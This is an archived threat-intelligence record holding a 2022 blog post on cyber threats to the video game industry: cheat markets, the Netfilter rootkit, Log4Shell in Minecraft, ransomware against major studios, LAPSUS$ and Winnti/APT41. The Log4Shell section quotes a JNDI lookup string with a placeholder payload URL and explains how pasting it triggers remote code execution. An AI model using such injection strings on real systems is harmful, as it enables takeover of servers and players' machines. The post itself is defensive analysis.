{ "id": "5d24e7f4-2d03-4fcd-a226-9d907873a291", "created_at": "2026-04-06T02:12:34.654837Z", "updated_at": "2026-04-10T03:32:46.24182Z", "deleted_at": null, "sha1_hash": "165111901e0523e89e0ae7c5ad882d8519b08460", "title": "Gamer Cheater Hacker Spy", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3000244, "plain_text": "Gamer Cheater Hacker Spy\r\nBy BushidoToken\r\nPublished: 2022-05-01 · Archived: 2026-04-06 01:36:11 UTC\r\nThe title of this blog is a homage to the film Tinker Tailor Soldier Spy and presents the fact that video games and\r\ncheating is also tied to hacking and spying. It is a common trope in cybersecurity that professionals first became\r\ninterested in the field through an encounter while playing games. Speaking personally, I first became\r\nenthralled with hacking in 2008 by matching against some modders using hacked weapons while playing Halo\r\n3 (my favourite game of all time).\r\nThis blog aims to highlight why monitoring the video game industry is important for cyber threat intelligence\r\nanalysts hunting down the latest threats. Video games and hacking are very intertwined. Many hackers start out by\r\ncreating cheats for games, and have to play the games to begin with to learn how to hack them. \r\nThere are also several notable incidents whereby hacking in video games escalated to become critical issues for\r\nthe software development industry and enterprise security realms. This includes zero-day exploits, stolen code-signing certificates, rootkit development, and supply-chain attacks, as well as ransomware and intellectual\r\nproperty theft.\r\nThe Video Game Cheating Industry\r\nCheating in video games is as old as the industry itself. However, nowadays cheating is a massive multi-billion\r\ndollar underground economy. What was once only done by a small group of hackers has evolved into massive\r\nhttps://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html\r\nPage 1 of 12\n\ncriminal enterprises, selling Cheats-as-a-Service. \r\nIn March 2021, the BBC reported that Chinese police worked with Tencent to disrupt one of the largest video-game-cheating operations ever. The perpetrators designed and sold cheats for popular games, such as Overwatch\r\nand Call of Duty. Approximately $76m (£55m) in revenue was made by the criminal business, which charged a\r\nsubscription fee to clients. Subscription prices for users began at around $10 a day, and up to $200 a month.\r\nIn June 2021, security researcher Karsten Hahn uncovered a new rootkit signed by Microsoft. Later, Microsoft\r\npublished a blog investigating a threat actor distributing a malicious signed driver, dubbed the Netfilter rootkit,\r\nwithin gaming environments. The operation was able to trick Microsoft into signing their code by submitting\r\ndrivers for certification through the Windows Hardware Compatibility Program. The implications here were\r\nmassive, however, the malicious actor’s activity was limited to the gaming sector specifically in China. Microsoft\r\nalso said they believed the aim of the driver was to gain an advantage in games and possibly exploit other players\r\nby compromising their accounts through common tools like keyloggers. \r\nThe type of malicious software (malware) like the Netfilter rootkit is common in the gaming industry as to be able\r\nto defeat anti-cheat systems you often have to be running at a level lower than the Windows operating system\r\n(OS), at the kernel-mode level.\r\nHackers in Games\r\nOne of the most critical events in recent gaming history was Log4Shell, a vulnerability also known as CVE-2021-\r\n44228 with a CVSS score of 10.0. That was first uncovered by the Alibaba Security team and disclosed on 9\r\nDecember 2021 and was exploited immediately afterwards by a range of threats, including botnets, ransomware,\r\nand advanced persistent threat (APT) groups - but it all started in Minecraft. At the time of this writing, even five\r\nmonths since it was initially disclosed, thousands of applications remain vulnerable to Log4Shell.\r\nLog4Shell was a zero-day exploit in the ubiquitous Apache Log4j logging library that if exploited successfully\r\ncould lead to remote code execution (RCE) on the targeted device. Log4Shell is also trivial to exploit. It can be\r\ndone so by pasting \"${jndi:ldap://\u003cURL to payload\u003e}\" into an input field and waiting for Log4j to fetch the\r\nremote payload and execute it, opening a backdoor on the affected system.\r\nUsing Log4Shell, hackers quickly began exploiting the popular video game, Minecraft. When a user pasted the\r\nstring into a message they could compromise the entire Minecraft server and other players' systems. This soon\r\nbecame known as the \"worst week in Minecraft history\". As soon as players began to see this message pop up on\r\ntheir screens panic ensued. \r\nAs they began to realize the cause of this was the Log4Shell exploit others joined in and began to leverage it\r\nmalicious attacks in Minecraft, and in other games such as Dark Souls 3. This included exploiting Log4Shell to\r\ncompromise other players' accounts and stealing or destroying their in-game items, which can take months or\r\nyears to acquire and can be worth hundreds or thousands of real dollars.\r\nhttps://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html\r\nPage 2 of 12\n\nFigure 1. Log4Shell exploited in Minecraft\r\nHistorical Cybersecurity Incidents In The Gaming industry\r\nVideo game developers and publishers receive many of the same threats that organizations such as banks or\r\ngovernments may receive. To empathize the severity of the threat, Microsoft has an entire division and security\r\noperations center (SOC) dedicated to protecting the Xbox Live Network and development. \r\nA variety of notable cybersecurity incidents that affected major household names are as follows:\r\nIn 2003, Half Life 2's source was stolen after the email of Valve's co-founder Gabe Newell was\r\ncompromised and the entire Half Life 2 source tree was downloaded from his computer\r\nIn October 2014, four people were charged in the US and one in Australia for their alleged involvement in\r\na hacking ring known as Xbox Underground that stole source code and intellectual property from a variety\r\nof games companies and Microsoft\r\nIn October 2016, two teenage members of Lizard Squad and PoodleCorp were arrested for launching\r\nDistributed Denial of Service (DDoS) attacks against Pokémon GO servers and ruining gamers’ Christmas\r\nwith a DDoS against the servers that power PlayStation and Xbox consoles\r\nIn March 2019, Dr. Web researchers discovered 39% of all existing Counter-Strike 1.6 game servers were\r\nbeing used by malicious actors in attempts to infect players with the Belonard Trojan botnet by exploiting\r\ngame client vulnerabilities\r\nIn April 2020, the source code of Valve's Team Fortress 2 and Counter-Strike: Global Offensive games was\r\nre-leaked on the Internet for anyone to download after already being leaked in 2018\r\nAlso in April 2020, 160,000 Nintendo customer accounts getting hijacked via credential stuffing, which led\r\nto Nintendo disconnecting NNID legacy login system from main Nintendo profiles\r\nIn December 2021, security researchers disclosed that they found several sets Amazon Web Services\r\n(AWS) keys in an exposed affected S3 bucket, with which it was possible scripts run and upload files to\r\ndomains of SEGA Europe\r\nThe Game Industry Is Targeted By Organized Cybercriminals\r\nhttps://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html\r\nPage 3 of 12\n\nLike any software development company, many large games companies will have corporate networks that can be\r\ntargeted by cybercriminals and advanced persistent threat (APT) groups for extortion or intellectual property theft.\r\nThere have been a number of high-profile and painful ransomware attacks against household names. Chinese-speaking APT groups have also targeted games companies for a variety of reasons, including intellectual property\r\ntheft and important artefacts such as code-signing certificates. These incidents are a lot more serious than account\r\nhijacking or cheating, they verge into the corporate espionage and organized cybercrime realms.\r\nCrytek and Ubisoft\r\nIn October 2020, video game developer Crytek was victim to an Egregor ransomware attack, which subsequently\r\nalso reportedly affected Ubisoft. In addition to encrypting devices on Crytek's network, the Egregor operators\r\nstole unencrypted files from the company and leaked a 380MB archive on its darknet leak site containing data\r\nfrom WarFace and Crytek's cancelled Arena of Fate MOBA game. The Egregor operators also managed to\r\nallegedly steal data pertaining to Ubisoft's Watch Dogs: Legion game (which is ironically all about hacking). On\r\n28 October, Egregor posted a 500GB archive containing assets from the game.\r\nhttps://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html\r\nPage 4 of 12\n\nFigure 2. Ubisoft and Crytek appearing on Egregor's darknet leak site\r\nEgregor ransomware appeared in September 2020 and was the heir apparent to the infamous Maze ransomware\r\ngroup, which first emerged in May 2019. Both Egregor and Maze, as well as Sekhmet, were attributed to the same\r\ngroup of organized cybercriminals tracked altogether as the TwistedSpider cryptonym by CrowdStrike.  For\r\nEgregor, initial access was gained through the use of the QakBot banking Trojan, the targeting of unpatched\r\nVirtual Private Network (VPN) appliances, and Remote Desktop Protocol (RDP) services. In February 2022, 14\r\nmonths since the group shuttered its data leak sites and ceased attacks, the master decryption keys for the Maze,\r\nEgregor, and Sekhmet ransomware operations were released on the BleepingComputer forums by the alleged\r\nmalware developer.\r\nCAPCOM\r\nhttps://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html\r\nPage 5 of 12\n\nJapanese games developer Capcom is well-known for its iconic game franchises, including Street Fighter,\r\nResident Evil, Devil May Cry, Monster Hunter, and Mega Man. In November 2020, the company announced it\r\nwas hit by a crippling ransomware attack. The attack was orchestrated by the RagnarLocker group (aka\r\nVikingSpider), a Russian-speaking organized cybercriminal group. The threat group's previous victims include\r\nEnergias de Portugal, CMA CGM, and Campari. In each case, the group demanded between $10-$15 million in\r\nransom for the decryption keys and to prevent stolen data from being published on the group's data leak blog\r\nhosted on the darknet.\r\nThe RagnarLocker threat actors claimed in the ransom note (see Figure 2) they stole up to 1TB of sensitive data\r\nfrom Capcom's corporate networks in Japan, the US, and Canada. This included intellectual property, employee\r\npersonal data, sensitive emails, and non-disclosure agreements. The group also threatened to leak and/or sell the\r\nstolen data if the ransom is not paid. Further, enclosed in the ransom note are screenshots of stolen files as well as\r\nincluding a list of Active Directory Users and Computers for the Capcom Windows domain. Security\r\nresearcher Pancak3 also told BleepingComputer that RagnarLocker claimed to have encrypted up to 2,000 devices\r\non Capcom's networks and are demanding $11 million in Bitcoins for a decryptor.\r\nFigure 3. RagnarLocker ransom note and leak site targeting Capcom\r\nIn January 2021, Capcom made a statement on the breach and disclosed that it suspected the data of up to 390,000\r\npeople was likely stolen. Capcom says the exposed data could be a mix of names, addresses, phone numbers, HR\r\ninformation, and email addresses. In April 2021, Capcom released a final statement on the November 2020\r\nRagnarLocker ransomware incident. The company says it had recovered from the attack, around six months since\r\nthe incident started. Capcom's final assessment regarding the data breach is that only 15,649 individuals were\r\nimpacted who were notified of their exposure. Stolen information also did not include payment card details, only\r\ncorporate and personally identifiable data. Digital forensics experts also identified that the Ragnar Locker\r\noperators gained initial access to Capcom’s internal network by exploiting a vulnerability in an unpatched VPN\r\ndevice located at the company’s North American subsidiary in California. From there, the adversary pivoted to\r\ndevices in offices in the US and Japan and executed the ransomware on 1 November 2020, causing email and file\r\nservers to be taken offline.\r\nCD PROJEKT RED\r\nhttps://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html\r\nPage 6 of 12\n\nOn 9 February 2021, creators of the popular Witcher game series and Cyberpunk 2077, CD Projekt Red (CDPR),\r\nannounced it was the victim of a ransomware attack by a threat group using a variant Emsisoft's Fabian\r\nWosar identified as HelloKitty (aka DeathKitty). The threat group responsible also claimed in the ransom note\r\n(see Figure 3) to have stolen the source code from several of CDPR's games. \r\nThe next day, on 10 February, vx-underground tweeted that CDPR's data had been leaked to an infamous Russian-speaking cybercrime forum known as Exploit[.]in. VICE Motherboard journalists obtained a copy of the data on a\r\nlow level hacking and data trading forum and downloaded it for verification purposes. The data included assets\r\nfrom CDPR's Witcher spin off game, Gwent. The cybercriminals responsible then posted about an auction of the\r\ndata for \"1kk$\" (which reportedly equals $1 million in underground Russian cybercriminal slang).\r\nFigure 4. HelloKitty ransom note and data leak targeting CD Projekt Red\r\nFrom the start, CDPR did not submit to the cybercriminal's demands. CDPR's statement at the time said \"We will\r\nnot give in to the demands nor negotiate with the actor, being aware that this may eventually lead to the release of\r\nhttps://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html\r\nPage 7 of 12\n\nthe compromised data.\" The company added that the hackers had \"successfully encrypted some devices\" on\r\nCDPR's network, but that the company had backups and begun restoring the data.\r\nElectronic Arts\r\nIn June 2021, Electronic Arts (EA) fell victim to a sophisticated social engineering attack that led to the theft of up\r\nto 780GB of proprietary source code from the FIFA franchise and its Frostbite game engine. The hacker and their\r\nassociates are part of a group, which later dubbed itself LAPSUS$, would go on to wreak havoc at top companies\r\nsuch as Microsoft, Nvidia, Vodafone, and Okta, as well as Ubisoft according to its Telegram channel.\r\nEA confirmed to VICE Motherboard that it had suffered a data breach and that the information listed by the\r\nhackers was the data that was stolen. The disturbing breach at EA was indicative of things to come. The LAPSUS$\r\ngroup used a combination of social engineering, cybercrime underground markets selling stolen credentials and\r\ncookies, SIM swapping, and some uncomplex techniques to compromise Windows systems. \r\nA leaked incident response report disclosed showed that once a LAPSUS$ member gained access to a\r\ncompromised Windows system via RDP, they would use Microsoft Bing to download hacking tools and exploits,\r\nsuch as ProcessHacker and Mimikatz, from Github to turn off the victim's Endpoint Detection and Response\r\n(EDR) protection and dump credentials from the system's memory and then copied to Pastebin.\r\nFigure 5. Threat actors connected to LAPSUS$ advertise stolen EA source code\r\nWhat made LAPSUS$ so interesting is that their unique set of skills proved to be highly effective against\r\ncompanies with some of the best enterprise security defences in the world. These teenage hackers began by\r\ntargeting a games company and went on to hit a company like Okta, which is used by hundreds of not only the\r\nFortune 500, but also governments worldwide. The motivation of LAPSUS$ appeared to be for financial gains,\r\nhowever, as the hacks got more brazen it seemingly became a quest for notoriety and infamy. The group had a\r\nTelegram channel with up to 47,000 subscribers and would brag about each hack on it. Ultimately, on 24 March\r\n2022, British police arrested seven suspects between the ages of 16 and 21 reportedly part of the gang.\r\nThe story did not end there though. On 30 March, LAPSUS$ posted details about another breach against a\r\nsoftware consultancy giant Globant, where the group had stolen 70GB of data, including customer source code.\r\nhttps://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html\r\nPage 8 of 12\n\nFurther, on 22 April, KrebsOnSecurity obtained a copy of the private chat messages between members of the\r\nLAPSUS$ cybercrime group. The leaked chats revealed that LAPSUS$ also breached T-Mobile (Deutsch\r\nTelekom) multiple times in March 2022, stealing source code for a range of company projects. \r\nAnother disturbing revelation to come out of the LAPSUS$ campaign was the group's use of fake emergency data\r\nrequests. This is where these cybercriminals could successfully use a hacked police or government department\r\nemail account to request emergency access to personal subscriber information from internet service providers,\r\nphone companies and social media firms via the pretext that the request does not require a warrant because\r\nsomebody's life is at risk. The companies would often comply due to it being an emergency and coming from a\r\nlegitimate but compromised government or police email address.\r\nAPTs Hacking Games Companies For Espionage And Profit\r\nSince at least 2009, a sophisticated Chinese hacking group known as Winnti has targeted the gaming industry. The\r\nWinnti threat group's other cryptonyms include APT41, BARIUM, WickedPanda, and WickedSpider. The gaming\r\nindustry is not Winnti's only target, however, as the group has infiltrated over 100 victim companies in the US and\r\nabroad, including software development companies, computer hardware manufacturers, telecommunications\r\nproviders, social media companies, non-profit organizations, universities, think tanks, and foreign governments, as\r\nwell as pro-democracy politicians and activists in Hong Kong. Five members of APT41 were indicted by the US\r\nDepartment of Justice in September 2020 with an additional two members arrested in Malaysia. US prosecutors\r\naccused the two of working on behalf of the Chinese government’s intelligence agency, the Guangdong State\r\nSecurity Department (GSSD) of the Ministry of State Security (MSS).\r\nIn April 2013, Kaspersky disclosed a report called “Winnti - More than just a game\". The researchers reported that\r\nin Q3 2011, the Winnti group's malware was detected on a large number of computers that were linked together\r\nthrough the mutual use by players of a popular online game. It was later revealed that the malware landed on the\r\nplayers' systems as part of a regular update from the game's official update server. Making it one of the first of\r\nseveral software supply-chain attacks orchestrated by this threat group. APT41 would go on to orchestrate the\r\ninfamous CCleaner supply-chain attack years later in September 2017.\r\nKaspersky researchers uncovered that the digital signature used to sign the original Winnti malware was stolen\r\nfrom another video game vendor known as KOG, based in South Korea. The researchers then found that between\r\n2011 and 2013, the Winnti group had used at least 18 stolen code-signing certificates in its campaigns all\r\nbelonging to video games companies from South Korea, Japan, the Philippines, China, and the US.\r\nhttps://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html\r\nPage 9 of 12\n\nFigure 6. APT41 indicted by the Department of Justice in September 2020\r\nHacking video games companies by a sophisticated state-sponsored adversary seemed unusual. This was due to\r\nthe fact that during the same timeframe Chinese APTs had targeted Google, Adobe, and the New York Times.\r\nMany security experts were curious why Chinese intelligence agencies were heavily investing resources into\r\nhacking games companies. \r\nPotential Winnti objectives for targeting the gaming industry:\r\nObjective 1 - Online games could be exploited to accumulate in-game currency, which could be resold for\r\nreal currency\r\nObjective 2 - Source code theft could be used to find exploits in the software to support Objective 1 \r\nObjective 3 - Having zero-day exploits in any software is advantageous for an intelligence agency as it\r\ngrants the ability to target other organizations and individuals\r\nObjective 4 - Stealing personal customer data\r\nObjective 5 - Stealing software inventions and innovations to support other industries, such as military\r\ncombat simulators\r\nObjective 6 - Stealing intellectual property to reproduce in their own domestic gaming industry\r\nObjective 7 - Repurposing resources like code-signing certificates and email accounts for other cyber-espionage campaigns\r\nAdditionally, in March 2019 and April 2020, security researchers from ESET and QuoIntelligence, respectively,\r\ndisclosed further campaigns linked to the Winnti group against the video games industry. Indicating that these\r\nadversaries continue to spy on games companies, primarily in Asia, up to 10 years later since the campaign began.\r\nIn March 2021, ESET also disclosed another campaign reminiscent of previous Winnti attacks but did not\r\nformally attribute it to the APT group. The researchers uncovered a software supply-chain attack against\r\nhttps://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html\r\nPage 10 of 12\n\nemulation software, NoxPlayer, to install surveillance malware on the computers of online gamers. The maker of\r\nNoxPlayer, BigNox, says the software has 150 million users in 150 countries. The infrastructure of BigNox, was\r\nreportedly compromised by an adversary to push a malicious update. And, in some cases, additional payloads\r\nwere downloaded by the BigNox updater from attacker-controlled servers.\r\nSo What?\r\nHopefully this blog highlights the fact that it is particularly important to monitor the cyber threat landscape of the\r\ngaming industry. There have been several occasions where a cyber incident began in the gaming sector and\r\neventually worked its way to the software industry, and thus all other sectors are affected by it. The Log4Shell\r\nevent, several software supply-chain attacks, digital certificate theft campaigns, and intellectual property theft\r\ncampaigns, among others. Although these incidents may have started in the gaming industry it eventually affected\r\ntop companies, such as Microsoft. \r\nIn my experience, hackers have often started out by hacking their favourite game. They either reverse engineer it\r\nthemselves, learn from others, or encounter other hackers online. This then leads to cheating and/or selling cheats\r\nand techniques, and potentially zero-day exploit development. Although some of these larger cheating shops may\r\npossess the ability to discover a zero-day vulnerability or develop a Proof-of-Concept (PoC) exploit to support\r\ntheir cheats, there are much larger ramifications affecting the entire enterprise IT ecosystem.\r\nKey reasons to monitor the gaming industry cyber threat landscape:\r\nFrom a Cyber Threat Intelligence (CTI) perspective, it can be useful to monitor hacking activities in the\r\ngaming communities as it can sometimes lead to corporate enterprise security \r\nAlso from a CTI perspective, the tactics, techniques, and procedures (TTPs) that affect video game\r\ncompanies will affect the software industry, and thus all other sectors\r\nFrom a detection engineering perspective, monitoring the cheating industry for the latest rootkit\r\ndevelopments and bypassing anti-cheat systems is important to identify the latest techniques leveraged in\r\nthe wild for bypassing defences\r\nFrom a software development perspective, it would also be useful to monitor the development of bypasses\r\nfor copyright protection and anti-piracy protections of games\r\nAdditional Resources\r\nGames companies that have appeared on Have I Been Pwned?\r\nSony PSN in 2011, Dungeons \u0026 Dragons Online in 2013, LOTR Online in 2013, Warframe in\r\n2014, Epic Games in 2016, SubaGames in 2016, Evony in 2016, Unreal Engine forum in 2016, CD\r\nProjekt Red in 2017, BlankMediaGames in 2018, Mortal Online in 2018, Armor Games in 2019,\r\nIDC Games in 2021\r\nDarknet Diaries Episodes on Hacking Online Video Games for Fun\r\nPart I - https://darknetdiaries.com/episode/7/\r\nPart II - https://darknetdiaries.com/episode/8/\r\nDarknet Diaries Episodes on Xbox Underground\r\nPart I - https://darknetdiaries.com/episode/45/\r\nPart II - https://darknetdiaries.com/episode/46/\r\nhttps://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html\r\nPage 11 of 12\n\nDarknet Diaries Episode on the Vide Game Cheating Industry\r\nhttps://darknetdiaries.com/episode/115/\r\nSource: https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html\r\nhttps://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html\r\nPage 12 of 12", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html" ], "report_names": [ "gamer-cheater-hacker-spy.html" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "be5097b2-a70f-490f-8c06-250773692fae", "created_at": "2022-10-27T08:27:13.22631Z", "updated_at": "2026-04-10T02:00:05.311385Z", "deleted_at": null, "main_name": "LAPSUS$", "aliases": [ "LAPSUS$", "DEV-0537", "Strawberry Tempest" ], "source_name": "MITRE:LAPSUS$", "tools": [ "Mimikatz" ], "source_id": "MITRE", "reports": null }, { "id": "d4b9608d-af69-43bc-a08a-38167ac6306a", "created_at": "2023-01-06T13:46:39.335061Z", "updated_at": "2026-04-10T02:00:03.291149Z", "deleted_at": null, "main_name": "LAPSUS", "aliases": [ "Lapsus", "LAPSUS$", "DEV-0537", "SLIPPY SPIDER", "Strawberry Tempest", "UNC3661" ], "source_name": "MISPGALAXY:LAPSUS", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "5bbced13-72f7-40dc-8c41-dcce75bf885e", "created_at": "2022-10-25T15:50:23.695735Z", "updated_at": "2026-04-10T02:00:05.335976Z", "deleted_at": null, "main_name": "Winnti Group", "aliases": [ "Winnti Group" ], "source_name": "MITRE:Winnti Group", "tools": [ "PipeMon", "Winnti for Windows", "PlugX" ], "source_id": "MITRE", "reports": null }, { "id": "49822165-5541-423d-8808-1c0a9448d588", "created_at": "2022-10-25T16:07:23.384093Z", "updated_at": "2026-04-10T02:00:04.575678Z", "deleted_at": null, "main_name": "Barium", "aliases": [ "Brass Typhoon", "Pigfish", "Starchy Taurus" ], "source_name": "ETDA:Barium", "tools": [ "Agent.dhwf", "Agentemis", "Barlaiy", "BleDoor", "Cobalt Strike", "CobaltStrike", "Destroy RAT", "DestroyRAT", "Kaba", "Korplug", "POISONPLUG", "PlugX", "RbDoor", "RedDelta", "RibDoor", "Sogu", "TIGERPLUG", "TVT", "Thoper", "Winnti", "Xamtrav", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "2347282d-6b88-4fbe-b816-16b156c285ac", "created_at": "2024-06-19T02:03:08.099397Z", "updated_at": "2026-04-10T02:00:03.663831Z", "deleted_at": null, "main_name": "GOLD RAINFOREST", "aliases": [ "Lapsus$", "Slippy Spider ", "Strawberry Tempest " ], "source_name": "Secureworks:GOLD RAINFOREST", "tools": [ "Mimikatz" ], "source_id": "Secureworks", "reports": null }, { "id": "52d5d8b3-ab13-4fc4-8d5f-068f788e4f2b", "created_at": "2022-10-25T16:07:24.503878Z", "updated_at": "2026-04-10T02:00:05.014316Z", "deleted_at": null, "main_name": "Lapsus$", "aliases": [ "DEV-0537", "G1004", "Slippy Spider", "Strawberry Tempest" ], "source_name": "ETDA:Lapsus$", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "4d5f939b-aea9-4a0e-8bff-003079a261ea", "created_at": "2023-01-06T13:46:39.04841Z", "updated_at": "2026-04-10T02:00:03.196806Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "WICKED PANDA", "BRONZE EXPORT", "Brass Typhoon", "TG-2633", "Leopard Typhoon", "G0096", "Grayfly", "BARIUM", "BRONZE ATLAS", "Red Kelpie", "G0044", "Earth Baku", "TA415", "WICKED SPIDER", "HOODOO", "Winnti", "Double Dragon" ], "source_name": "MISPGALAXY:APT41", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e698860d-57e8-4780-b7c3-41e5a8314ec0", "created_at": "2022-10-25T15:50:23.287929Z", "updated_at": "2026-04-10T02:00:05.329769Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "APT41", "Wicked Panda", "Brass Typhoon", "BARIUM" ], "source_name": "MITRE:APT41", "tools": [ "ASPXSpy", "BITSAdmin", "PlugX", "Impacket", "gh0st RAT", "netstat", "PowerSploit", "ZxShell", "KEYPLUG", "LightSpy", "ipconfig", "sqlmap", "China Chopper", "ShadowPad", "MESSAGETAP", "Mimikatz", "certutil", "njRAT", "Cobalt Strike", "pwdump", "BLACKCOFFEE", "MOPSLED", "ROCKBOOT", "dsquery", "Winnti for Linux", "DUSTTRAP", "Derusbi", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "75108fc1-7f6a-450e-b024-10284f3f62bb", "created_at": "2024-11-01T02:00:52.756877Z", "updated_at": "2026-04-10T02:00:05.273746Z", "deleted_at": null, "main_name": "Play", "aliases": null, "source_name": "MITRE:Play", "tools": [ "Nltest", "AdFind", "PsExec", "Wevtutil", "Cobalt Strike", "Playcrypt", "Mimikatz" ], "source_id": "MITRE", "reports": null }, { "id": "945a572f-ebe3-4e2f-a288-512fe751cfa8", "created_at": "2022-10-25T16:07:24.413971Z", "updated_at": "2026-04-10T02:00:04.97924Z", "deleted_at": null, "main_name": "Winnti Group", "aliases": [ "G0044", "Leopard Typhoon", "Wicked Panda", "Winnti Group" ], "source_name": "ETDA:Winnti Group", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "FunnySwitch", "RbDoor", "RibDoor", "RouterGod", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null }, { "id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31", "created_at": "2023-01-06T13:46:38.376868Z", "updated_at": "2026-04-10T02:00:02.949077Z", "deleted_at": null, "main_name": "Cleaver", "aliases": [ "G0003", "Operation Cleaver", "Op Cleaver", "Tarh Andishan", "Alibaba", "TG-2889", "Cobalt Gypsy" ], "source_name": "MISPGALAXY:Cleaver", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775441554, "ts_updated_at": 1775791966, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/165111901e0523e89e0ae7c5ad882d8519b08460.pdf", "text": "https://archive.orkl.eu/165111901e0523e89e0ae7c5ad882d8519b08460.txt", "img": "https://archive.orkl.eu/165111901e0523e89e0ae7c5ad882d8519b08460.jpg" } }